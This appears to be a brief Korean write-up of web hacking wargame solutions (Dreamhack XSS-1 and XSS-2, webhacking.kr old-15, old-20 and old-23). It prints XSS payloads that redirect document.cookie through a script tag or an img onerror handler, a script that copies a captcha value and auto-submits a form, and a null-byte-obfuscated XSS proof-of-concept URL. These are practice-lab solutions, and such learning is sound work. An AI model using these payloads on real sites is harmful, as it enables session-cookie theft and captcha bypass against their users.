jiw0n

드림핵 XSS-1

사용자가 url을 서버에 제출하면 셀레니움으로 구현된 봇이 해당 url에 접속한다.

이 때 cookie값에 FLAG가 들어있으므로 XSS로 다음과 같이 memo 파라미터로 cookie값을 넘겨주게되면 FLAG를 얻을 수 있다.

<script>
  document.location.href = `/memo?memo=${document.cookie}`;
</script>

드림핵 XSS-2

innerHTML로 들어간 script 태그는 실행되지 않기 때문에 img 태그로 했다.

 <img src="#" onerror="location.href='/memo?memo='+document.cookie">

dreamhack.io -> dev tools

개발자 도구 이용해서 디렉토리 검색하다보면 나온다.

webhacking.kr -> old-15

javascript disable 한 후 접근하면 FLAG를 얻을 수 있다.

webhacking.kr -> old-20

개발자 도구를 이용해서 captcha value를 자동으로 가져온 후, 제출하는 자바스크립트 코드를 작성하여 새로고침 시 코드를 바로 실행하면 된다.

Payload

(function() {
    lv5frm.id.value = "hi";
    lv5frm.cmt.value = "hi";
    lv5frm.captcha.value = lv5frm.captcha_.value;
    lv5frm.submit()
})()

webhacking.kr -> old-23

poc

https://webhacking.kr/challenge/bonus-3/index.php?code=%3C%00s%00c%00r%00i%00p%00t%3Ea%00l%00e%00r%00t(%001%00);%3C%00/%00s%00c%00r%00i%00p%00t%3E

정보보안 3원칙

기밀성, 무결성, 가용성